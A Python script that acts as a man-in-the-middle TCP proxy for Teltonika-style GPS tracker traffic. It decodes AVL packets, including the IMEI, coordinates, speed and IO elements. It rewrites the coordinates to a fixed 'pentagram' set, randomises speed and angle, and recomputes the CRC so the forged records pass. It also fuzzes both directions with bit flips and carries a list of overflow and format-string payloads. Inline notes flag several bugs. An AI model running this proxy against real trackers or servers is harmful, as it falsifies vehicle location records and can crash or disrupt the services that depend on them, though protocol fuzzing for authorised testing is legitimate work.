- import datetime
- from twisted.protocols import portforward
- from twisted.internet.protocol import DatagramProtocol
- from twisted.internet import reactor
- import getopt, sys
- import binascii
- from random import randint
# Parser state; the functions below reach these through ``global``.
lst_full = []  # header/data/CRC pieces of the packet being parsed (parce)
lst_data = []  # one list per AVL record of that packet (parce_data)

# Proxy and CLI settings, filled in by main().
verbose = False   # -v: dump traffic in both directions
notuntil = 0      # -w: requests to pass through untouched before fuzz() is applied
request = 0       # requests seen so far while waiting for notuntil
count = 1         # while truthy, a frame shorter than 35 bytes is treated as the IMEI frame
proto = "tcp"
localport = 0     # -l
desthost = ""     # -r
destport = 0      # -p
testclient = 0    # -c: fuzz the server -> client direction
testserver = 0    # -s (see main())

# Record-rewriting options and parser cursor.
smth_x = 0        # -x: lower bound of the random speed
smth_y = 0        # -y: upper bound of the random speed
x_ = 20           # hex-digit offset of the current AVL record inside the packet
change = 0        # set by parce_data() when a field was rewritten -> parce() refreshes the CRC
pent_c = 0        # index of the next pent entry to use
g_count = 0       # packet counter, stepped by 15 in parce()
rnd_angle = 0     # -a: replace the angle with a random value
rnd_coord = 0     # -k: replace the coordinates with the pent table

# [lat, lon] pairs in degrees * 1e7, cycled through when rnd_coord is set.
pent = [
    [600056480, 303452580],
    [598401910, 304894530],
    [599464550, 301303380],
    [599478320, 305629240],
    [598401910, 301990020],
]

# Payloads that bofinjection() splices into a frame; picked by random index.
overflowstrings = [
    "A" * 255, "A" * 256, "A" * 257, "A" * 420, "A" * 511, "A" * 512,
    "A" * 1023, "A" * 1024, "A" * 2047, "A" * 2048, "A" * 4096, "A" * 4097,
    "A" * 5000, "A" * 10000, "A" * 20000,
    "A" * 32762, "A" * 32763, "A" * 32764, "A" * 32765, "A" * 32766,
    "A" * 32767, "A" * 32768, "A" * 65534, "A" * 65535, "A" * 65536,
    "%x" * 1024, "%n" * 1025, "%s" * 2048, "%s%n%x%d" * 5000,
    "%s" * 30000, "%s" * 40000,
    "%.1024d", "%.2048d", "%.4096d", "%.8200d",
    "%99999999999s", "%99999999999d", "%99999999999x", "%99999999999n",
    "%99999999999s" * 1000, "%99999999999d" * 1000,
    "%99999999999x" * 1000, "%99999999999n" * 1000,
    "%08x" * 100,
    "%%20s" * 1000, "%%20x" * 1000, "%%20n" * 1000, "%%20d" * 1000,
    "%#0123456x%08x%x%s%p%n%d%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%#0123456x%%x%%s%%p%%n%%d%%o%%u%%c%%h%%l%%q%%j%%z%%Z%%t%%i%%e%%g%%f%%a%%C%%S%%08x",
]
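def crc16(buff, crc = 0, poly = 0xA001):
    """Return the reflected (LSB-first) CRC-16 of *buff* with no final XOR.

    Args:
        buff: data to checksum - a Python 2 ``str`` of raw bytes, a ``bytes``
            object, or any iterable of one-character strings / 0-255 ints.
        crc: initial register value; 0 gives the CRC-16/ARC variant
            (check value 0xBB3D for ``"123456789"``).
        poly: reflected generator polynomial, 0xA001 is 0x8005 bit-reversed.

    Returns:
        The 16-bit remainder as an int.
    """
    for symbol in buff:
        # Iterating ``bytes`` on Python 3 already yields ints; ord() is only
        # needed for one-character strings (Python 2 ``str``).
        value = symbol if isinstance(symbol, int) else ord(symbol)
        for _ in range(8):
            # Shift the register right, folding the polynomial in whenever
            # the low bit of the register and of the data byte differ.
            if (crc ^ value) & 1:
                crc = (crc >> 1) ^ poly
            else:
                crc >>= 1
            value >>= 1
    return crc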
def zero_fill(str, count):
    """Left-pad *str* with ``"0"`` characters up to a total width of *count*.

    A string that is already *count* characters or longer is returned as is.
    The parameter keeps its original name ``str`` (it shadows the builtin
    inside this function).
    """
    padding = "0" * (count - len(str))
    return padding + str
def bitflipping(data):
    """Replace about 7% of the positions of *data* with random characters.

    Runs ``len(data) * 7 // 100`` rounds; each round picks a random index and
    overwrites that one character with ``chr(randint(0, 255))`` (indices may
    repeat).  Strings shorter than 15 characters come back unchanged.
    """
    length = len(data)
    rounds = length * 7 // 100
    for _ in range(rounds):
        pos = randint(0, length - 1)
        data = "".join((data[:pos], chr(randint(0, 255)), data[pos + 1:]))
    return data
def bofinjection(data):
    """Splice one ``overflowstrings`` entry into *data*.

    One random index ``r`` selects both the payload and the cut point: the
    result is ``data[:r] + overflowstrings[r] + data[r - len(data):]``.  The
    tail slice uses a negative offset, so for ``r`` below ``len(data)`` it is
    simply ``data[r:]``.
    """
    length = len(data)
    choice = randint(0, len(overflowstrings) - 1)
    head = data[:choice]
    tail = data[choice - length:]
    return head + overflowstrings[choice] + tail
def fuzz(data):
    """Mutate *data* and return it, announcing "Fuzz ON" on stdout.

    bitflipping() is always applied (``randint(0, 0)`` is always 0).  The
    bofinjection() step is guarded by a second ``randint(0, 0) == 1`` test
    that can never be true, so it is dead code as written; both randint
    calls are kept so the random stream advances exactly as before.
    """
    print("Fuzz ON")
    if randint(0, 0) == 0:
        data = bitflipping(data)
    if randint(0, 0) == 1:  # never true, see docstring
        data = bofinjection(data)
    return data
def add_hex2(hex1, hex2):
    """Add two hexadecimal strings (with or without ``0x``) and return the sum as ``hex()`` text."""
    total = int(hex1, 16) + int(hex2, 16)
    return hex(total)
def lst_print_data(lst): ##print only data
    """Re-serialise the part of a parsed packet that parce() feeds to crc16().

    Concatenates ``lst[2]`` (codecID), ``lst[3]`` (number of data), the eight
    fields plus the flattened IO element of every record in ``lst[4]``, and
    ``lst[5]`` (number of data 2).  ``lst[0]``, ``lst[1]`` and the CRC in
    ``lst[6]`` are left out.  *lst* has the layout built by parce().
    """
    pieces = [lst[2], lst[3]]
    for record in lst[4]:
        for idx in range(8):
            pieces.append(record[idx])
        for io_part in record[8]:
            # IO parts are hex strings or lists of hex strings; extend()
            # flattens either by one level (a string contributes its chars).
            pieces.extend(io_part)
    pieces.append(lst[5])
    return "".join(pieces)
def lst_print(lst): ##print all packet
    """Re-serialise a whole parsed packet (layout of parce()) as one hex string.

    Order: ``lst[0]`` (leading zeros), ``lst[1]`` (data size), ``lst[2]``
    (codecID), ``lst[3]`` (number of data), the eight fields plus the
    flattened IO element of every record in ``lst[4]``, ``lst[5]`` (number of
    data 2) and ``lst[6]`` (CRC16).
    """
    pieces = [lst[0], lst[1], lst[2], lst[3]]
    for record in lst[4]:
        for idx in range(8):
            pieces.append(record[idx])
        for io_part in record[8]:
            # IO parts are hex strings or lists of hex strings; extend()
            # flattens either by one level (a string contributes its chars).
            pieces.extend(io_part)
    pieces.append(lst[5])
    pieces.append(lst[6])
    return "".join(pieces)
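def parce_imei(case2):
    """Print the IMEI announced by the first (short) frame of a session.

    Args:
        case2: the frame as a hex string; the first four hex digits are the
            length prefix and the remainder the hex-encoded IMEI text.

    Side effects:
        Sets the module global ``count`` to 0, so server_dataReceived() hands
        the following frames to parce() instead of here.

    Raises:
        TypeError/ValueError: when the IMEI part is not valid hex.
    """
    global count
    count = 0
    lst_imei = [case2[:4], case2[4:]]  # [0] - imei size, [1] - imei
    imei = binascii.unhexlify(lst_imei[1])
    if not isinstance(imei, str):
        # Python 3 returns bytes here (the original str.decode("hex") is
        # Python 2 only); the IMEI is expected to be ASCII digits.
        imei = imei.decode("ascii")
    print("===Hello IMEI: " + imei + "===")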
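def parce_data(case):
    """Parse, print and optionally rewrite one AVL record starting at ``x_``.

    Args:
        case: the whole packet as a hex string (two hex digits per byte).

    The record is read from ``case`` at the module-global cursor ``x_``; on
    return ``x_`` points past the record's IO element so successive calls from
    parce() walk the packet.  Every field is kept as its hex substring in
    ``lst_avl`` (index comments below give its position in ``lst_full``) and
    the record is appended to the global ``lst_data``.

    Optional rewrites of the hex fields:
      * ``rnd_coord``            - longitude/latitude from the next ``pent`` entry
      * ``rnd_angle``            - angle replaced by a random value in 200..300
      * ``smth_x``/``smth_y`` >0 - speed replaced by a random value in that range
    The coordinate and speed rewrites set the global ``change`` so that parce()
    recomputes the CRC.

    Raises:
        ValueError: on a truncated or non-hex packet (``int()`` of an empty or
            invalid field).
    """
    global x_
    global change
    global pent_c
    change=0
    y_=0
    lst_avl=[]
    lst_io_full=[]
    lst_io_1b=[]
    lst_io_2b=[]
    lst_io_4b=[]
    lst_io_8b=[]
    # Fixed-width AVL fields, as hex substrings relative to the cursor.
    lst_avl.append(case[x_:x_+16]) ## [2][i][0] - timestamp
    lst_avl.append(case[x_+16:x_+18]) ## [2][i][1] - Priority
    lst_avl.append(case[x_+18:x_+26]) ## [2][i][2]- long
    lst_avl.append(case[x_+26:x_+34]) ## [2][i][3]- lat
    lst_avl.append(case[x_+34:x_+38]) ## [2][i][4]- Alt
    lst_avl.append(case[x_+38:x_+42]) ## [2][i][5]- Angle
    lst_avl.append(case[x_+42:x_+44]) ## [2][i][6]- Satellites
    lst_avl.append(case[x_+44:x_+48]) ## [2][i][7]- Speed
    ##io##
    lst_io_full.append(case[x_+48:x_+50]) ## [2][i][8][0]- Event IO ID
    lst_io_full.append(case[x_+50:x_+52]) ## [2][i][8][1] - N of Total IO
    # Each IO group is a one-byte count followed by (id, value) pairs.  The
    # l?b_x/l?b_y pairs are the start/end offsets of each group's count
    # field; the next group starts 2 + count * stride hex digits later, where
    # stride is 2 (id) + 2 * value width.
    l1b_x=x_+52
    l1b_y=x_+54
    ################
    lst_io_full.append(case[l1b_x:l1b_y]) ## [2][i][8][2] - N1 of One Byte IO
    io_1b=int('0x'+lst_io_full[2],16)
    l2b_x=l1b_x+2+io_1b*4
    l2b_y=l1b_y+2+io_1b*4
    lst_io_full.append(lst_io_1b) ## [2][i][8][3] - List of 1b IO
    lst_io_full.append(case[l2b_x:l2b_y]) ## [2][i][8][4] - N2 of Two Byte IO
    io_2b=int('0x'+lst_io_full[4],16)
    l4b_x=l2b_x+2+io_2b*6
    l4b_y=l2b_y+2+io_2b*6
    lst_io_full.append(lst_io_2b) ## [2][i][8][5] - List of 2b IO
    lst_io_full.append(case[l4b_x:l4b_y]) ## [2][i][8][6] - N4 of Four Byte IO
    io_4b=int('0x'+lst_io_full[6],16)
    l8b_x=l4b_x+2+io_4b*10
    l8b_y=l4b_y+2+io_4b*10
    lst_io_full.append(lst_io_4b) ## [2][i][8][7] - List of 4b IO
    lst_io_full.append(case[l8b_x:l8b_y]) ## [2][i][8][8] - N8 of Eight Byte IO
    io_8b=int('0x'+lst_io_full[8],16)
    lst_io_full.append(lst_io_8b) ## [2][i][8][9] - List of 8b IO
    ################
    # NOTE(review): presumably a millisecond timestamp; keeping the first ten
    # decimal digits equals // 1000 only for 13-digit values - confirm.
    # fromtimestamp() renders it in the local time zone.
    dt = datetime.datetime.fromtimestamp(float(str(int('0x'+lst_avl[0],16))[:10])).strftime('%Y-%m-%d %H:%M:%S')
    print("\tTimeStamp: " + lst_avl[0] + " ("+ dt +")")
    print("\tPriority: " + lst_avl[1])
    print("\tGPS Element:")
    # lst_avl[2] is the longitude (the "E" value) and lst_avl[3] the latitude;
    # the original labelled both lines "Latitude".
    lon = float(int('0x'+lst_avl[2],16))/10000000
    print("\t\tLongitude: " + lst_avl[2] + " (" + str(lon) +" E)")
    lat = float(int('0x'+lst_avl[3],16))/10000000
    print("\t\tLatitude: " + lst_avl[3] + " (" + str(lat) +" N)")
    ##change coord
    if rnd_coord:
        # Cycle through pent ([lat, lon] pairs).  hex() is used without
        # zero_fill(), so the table values must stay 8 hex digits wide or the
        # re-serialised packet shifts.
        lst_avl[2]=hex(pent[pent_c][1]).replace('0x','')
        lst_avl[3]=hex(pent[pent_c][0]).replace('0x','')
        lon = float(int('0x'+lst_avl[2],16))/10000000
        print("\t\t--->New Longitude: " + lst_avl[2] + " (" + str(lon) +" E)")
        lat = float(int('0x'+lst_avl[3],16))/10000000
        print("\t\t--->New Latitude: " + lst_avl[3] + " (" + str(lat) +" N)")
        pent_c=pent_c+1
        if pent_c==len(pent):
            pent_c=0
        change=1
    alt =int('0x'+lst_avl[4],16)
    print("\t\tAltitude: "+ lst_avl[4] + " (" + str(alt) +" meters)")
    ang =int('0x'+lst_avl[5],16)
    print("\t\tAngle: "+ lst_avl[5] + " (" + str(ang) +")")
    ##change angle
    if rnd_angle:
        lst_avl[5]=zero_fill(hex(randint(200,300)).replace('0x',''),4)
        ang =int('0x'+lst_avl[5],16)
        print("\t\t--->New Angle: "+ lst_avl[5] + " (" + str(ang) +")")
        # NOTE(review): unlike the coordinate and speed rewrites this branch
        # does not set change=1, so parce() leaves the old CRC in place when
        # only -a is used - confirm whether that is intended.
    sat=int('0x'+lst_avl[6],16)
    print("\t\tSattelites: "+ lst_avl[6] + " (" + str(sat) +" visible sattelites)")
    spd=int('0x'+lst_avl[7],16)
    print("\t\tSpeed: "+ lst_avl[7] + " (" + str(spd) +" km/h)")
    ###change speed
    if smth_x>0 and smth_y>0:
        # randint() raises ValueError if smth_y < smth_x.
        lst_avl[7]=zero_fill(hex(randint(smth_x,smth_y)).replace('0x',''),4)
        spd=int('0x'+lst_avl[7],16)
        print("\t\t--->New Speed: "+ lst_avl[7] + " (" + str(spd) +" km/h)")
        change=1
    print("\tIO Element:")
    io_id=int('0x'+lst_io_full[0],16)
    print("\t\tEvent IO ID: " + lst_io_full[0] + " (" + str(io_id) +")")
    io_total=int('0x'+lst_io_full[1],16)
    print("\t\tTotal ID:" + lst_io_full[1] + " (" + str(io_total) +" IO elements)")
    # The cursor is moved to the end of each group's count field in turn; y_
    # tracks the end of the last (id, value) pair actually read so x_ can be
    # pushed past it at the end.  (The original also did x_=x_+50 here, which
    # was overwritten immediately below and has been dropped.)
    print("\t\tCount of 1 byte IO: " + lst_io_full[2] + " (" + str(io_1b) +")")
    x_=l1b_y
    for i in range(io_1b):
        lst_io_1b.append(case[l1b_x+2+i*4:l1b_y+2+i*4]) ## [2][i][8][3][i*2] - N'st IO ID
        lst_io_1b.append(case[l1b_x+4+i*4:l1b_y+4+i*4]) ## [2][i][8][3][i*2+1] - N'st IO value
        tmp_io1=int('0x'+lst_io_1b[i*2],16)
        tmp_io2=int('0x'+lst_io_1b[i*2+1],16)
        print("\t\t\tIO ID: " + lst_io_1b[i*2] + " (" + str(tmp_io1)+ ")")
        print("\t\t\t"+str(tmp_io1) + "'st IO value: " + lst_io_1b[i*2+1] + " (" + str(tmp_io2)+ ")")
        y_=l1b_y+4+i*4
    print("\t\tCount of 2 byte IO: " + lst_io_full[4] + " (" + str(io_2b) +")")
    x_=l2b_y
    for i in range(io_2b):
        lst_io_2b.append(case[l2b_x+2+i*6:l2b_y+2+i*6]) ##[2][i][8][5][i*2] - N'st IO ID
        lst_io_2b.append(case[l2b_x+4+i*6:l2b_y+6+i*6]) ##[2][i][8][5][i*2+1] - N'st IO value
        tmp_io1=int('0x'+lst_io_2b[i*2],16)
        tmp_io2=int('0x'+lst_io_2b[i*2+1],16)
        print("\t\t\tIO ID: " + lst_io_2b[i*2] + " (" + str(tmp_io1)+ ")")
        print("\t\t\t"+str(tmp_io1) + "'st IO value: " + lst_io_2b[i*2+1] + " (" + str(tmp_io2)+ ")")
        y_=l2b_y+6+i*6
    print("\t\tCount of 4 byte IO: " + lst_io_full[6] + " (" + str(io_4b) +")")
    x_=l4b_y
    for i in range(io_4b):
        lst_io_4b.append(case[l4b_x+2+i*10:l4b_y+2+i*10]) ##[2][i][8][7][i*2] - N'st IO ID
        lst_io_4b.append(case[l4b_x+4+i*10:l4b_y+10+i*10]) ##[2][i][8][7][i*2+1] - N'st IO value
        tmp_io1=int('0x'+lst_io_4b[i*2],16)
        tmp_io2=int('0x'+lst_io_4b[i*2+1],16)
        print("\t\t\tIO ID: " + lst_io_4b[i*2] + " (" + str(tmp_io1)+ ")")
        print("\t\t\t"+str(tmp_io1) + "'st IO value: " + lst_io_4b[i*2+1] + " (" + str(tmp_io2)+ ")")
        y_=l4b_y+10+i*10
    print("\t\tCount of 8 byte IO: " + lst_io_full[8] + " (" + str(io_8b) +")")
    x_=l8b_y
    for i in range(io_8b):
        # Offsets are relative to the 8-byte group's count field (l8b_*).  The
        # original reused the 4-byte group's l4b_* here, so every 8-byte IO
        # (and the final cursor) was sliced from the wrong place.
        lst_io_8b.append(case[l8b_x+2+i*18:l8b_y+2+i*18]) ##[2][i][8][9][i*2] - N'st IO ID
        lst_io_8b.append(case[l8b_x+4+i*18:l8b_y+18+i*18]) ##[2][i][8][9][i*2+1] - N'st IO value
        tmp_io1=int('0x'+lst_io_8b[i*2],16)
        tmp_io2=int('0x'+lst_io_8b[i*2+1],16)
        print("\t\t\tIO ID: " + lst_io_8b[i*2] + " (" + str(tmp_io1)+ ")")
        print("\t\t\t"+str(tmp_io1) + "'st IO value: " + lst_io_8b[i*2+1] + " (" + str(tmp_io2)+ ")")
        y_= l8b_y+18+i*18
    if y_>0 and x_<y_:
        x_=y_
    lst_avl.append(lst_io_full)
    lst_data.append(lst_avl)
    print("count:"+str(g_count))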
def parce(case):
    """Parse one hex-encoded packet, print its fields and return it re-serialised.

    *case* is the whole TCP payload as a hex string.  The header pieces are
    sliced into the global ``lst_full`` (see the index comments), each AVL
    record is handled by parce_data(), and when a record was rewritten
    (``change``) the CRC16 over codecID .. number-of-data-2 is recomputed and
    zero-padded to 8 hex digits.  Returns ``lst_print(lst_full)``, the hex
    string to forward.  Relies on ``str.decode("hex")``, i.e. Python 2.
    """
    global lst_full
    global lst_data
    global x_
    global change
    global g_count
    x_ = 20  # data offset: the first AVL record follows the 20-hex-digit header
    lst_full = []
    lst_data = []
    print("\n==========start parser============")
    lst_full.append(case[:8])       ## [0] - 4 zero bytes
    lst_full.append(case[8:16])     ## [1] - Size of Data
    lst_full.append(case[16:18])    ## [2] - codecID
    lst_full.append(case[18:20])    ## [3] - Number of Data
    lst_full.append(lst_data)       ## [4] - Data, filled in by parce_data()
    lst_full.append(case[-10:-8])   ## [5] - Number of Data2
    lst_full.append(case[-8:])      ## [6] - CRC16
    data_size = int('0x' + lst_full[1], 16)
    print("Data size: " + lst_full[1] + " (" + str(data_size) + " bytes)")
    print("codecID: " + lst_full[2])
    record_count = int('0x' + lst_full[3], 16)
    print("Number of Data: " + lst_full[3] + " (" + str(record_count) + ")")
    for idx in range(record_count):
        print("Data #" + str(idx + 1) + ":")
        parce_data(case)
    record_count2 = int('0x' + lst_full[5], 16)
    print("Number of Data2: " + lst_full[5] + " (" + str(record_count2) + ")")
    print("CRC16: " + lst_full[6])
    if change == 1:
        covered = lst_print_data(lst_full)
        lst_full[6] = zero_fill(hex(crc16(covered.decode("hex"))).replace('0x', ''), 8)
        print("--->New CRC: " + lst_full[6])
        change = 0
    g_count = g_count + 15
    return lst_print(lst_full)
def server_dataReceived(self, data):
    """Replacement for portforward.ProxyServer.dataReceived (client -> server).

    With ``testserver`` set, the first ``notuntil`` requests pass untouched and
    later ones go through fuzz().  With ``verbose`` the payload is dumped as
    hex.  While ``count`` is truthy a frame shorter than 35 bytes is handed to
    parce_imei(); any other frame is parsed by parce() and the re-serialised
    bytes are forwarded via the original Proxy.dataReceived.  There is no
    error handling here: a malformed frame makes parce() raise and the frame
    is then not forwarded.
    """
    global verbose
    global notuntil
    global request
    global count
    global testserver
    if testserver:
        if request >= notuntil:
            data = fuzz(data)
        else:
            request = request + 1
    if verbose:
        print("Client ------> server")
        print(binascii.b2a_hex(data))
    hexdata = binascii.b2a_hex(data)
    if count and len(data) < 35:
        parce_imei(hexdata)
    else:
        print("Start")
        # NOTE(review): count goes back to 1 here, so a later frame shorter
        # than 35 bytes is treated as an IMEI frame again - confirm intent.
        count = 1
        data = binascii.a2b_hex(parce(hexdata))
    portforward.Proxy.dataReceived(self, data)
# Monkey-patch Twisted's ProxyServer so inbound data runs through server_dataReceived.
portforward.ProxyServer.dataReceived = server_dataReceived
def client_dataReceived(self, data):
    """Replacement for portforward.ProxyClient.dataReceived (server -> client).

    With ``testclient`` set, the first ``notuntil`` responses pass untouched
    (``request`` is the same counter server_dataReceived() uses) and later
    ones go through fuzz().  With ``verbose`` the raw payload is printed with
    %r.  Nothing is parsed in this direction; the data is handed on to the
    original Proxy.dataReceived.
    """
    global verbose
    global notuntil
    global request
    global testclient
    if testclient:
        if request >= notuntil:
            data = fuzz(data)
        else:
            request = request + 1
    if verbose:
        print("Server ------> Client")
        print("%r" % data)
    portforward.Proxy.dataReceived(self, data)
# Monkey-patch Twisted's ProxyClient so responses run through client_dataReceived.
portforward.ProxyClient.dataReceived = client_dataReceived
def starttcpproxy():
    """Listen on ``localport`` and forward each connection to ``desthost:destport``.

    Builds a Twisted ProxyFactory and runs the reactor; the call blocks until
    the reactor stops.
    """
    factory = portforward.ProxyFactory(desthost, destport)
    reactor.listenTCP(localport, factory)
    reactor.run()
def usage():
    """Print the command-line help text to stdout, one line per option."""
    help_lines = [
        "python decode_telt.py -l <localport> -r <remotehost> -p <remoteport> [options]",
        "",
        " [options]",
        " -c: Fuzz only client side (both otherwise)",
        " -s: Fuzz only server side (both otherwise)",
        " -w: Number of requests to send before start fuzzing",
        " -v: Verbose (outputs network traffic)",
        " -x: Random Speed. From x",
        " -y: Random Speed. To y",
        " -a: Random angle",
        " -k: Pentagram",
        " -h: Help page",
    ]
    for line in help_lines:
        print(line)
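def main():
    """Parse the command line into the module globals and start the proxy.

    Options (see usage()): -l local port, -r remote host, -p remote port,
    -w requests to pass before fuzzing, -v verbose, -a random angle,
    -k pentagram coordinates, -c client-side fuzzing, -s (see note below),
    -x/-y speed range, -h/--help.

    Exits with status 2 on an unknown option, a non-integer value for
    -l/-p/-w/-x/-y, or when -l, -r and -p are not all given; exits 0 after
    printing the help.  Otherwise starttcpproxy() is entered and blocks.
    """
    global notuntil
    global proto
    global localport
    global desthost
    global destport
    global testclient
    global testserver
    global verbose
    global smth_x
    global smth_y
    global rnd_angle
    global rnd_coord
    try:
        opts, _ = getopt.getopt(sys.argv[1:], "vakhcsl:r:p:w:x:y:", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    try:
        for o, a in opts:
            if o in ("-h", "--help"):
                usage()
                sys.exit()
            if o == "-l":
                localport = int(a)
            if o == "-r":
                desthost = a
            if o == "-p":
                destport = int(a)
            if o == "-v":
                verbose = True
            if o == "-a":
                rnd_angle = 1
            if o == "-k":
                rnd_coord = 1
            if o == "-w":
                notuntil = int(a)
            if o == "-c":  # Only client
                testclient = 1
            if o == "-s":  # Only server
                # NOTE(review): assigns 0, which is already the default, so -s
                # has no effect as written while usage() says it enables
                # server-side fuzzing - confirm the intended value.
                testserver = 0
            if o == "-x":
                smth_x = int(a)
            if o == "-y":
                smth_y = int(a)
    except ValueError:
        # Only the int() conversions can fail here.  The original bare
        # ``except:`` also caught the SystemExit raised by -h, so the help was
        # printed twice and the process exited with status 2.
        usage()
        sys.exit(2)
    if localport == 0 or desthost == "" or destport == 0:
        usage()
        sys.exit(2)
    if proto == "tcp":
        starttcpproxy()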
# Script entry point (not run on import): parse the options, then start the
# proxy, which blocks in the Twisted reactor.
if __name__ == '__main__':
    main()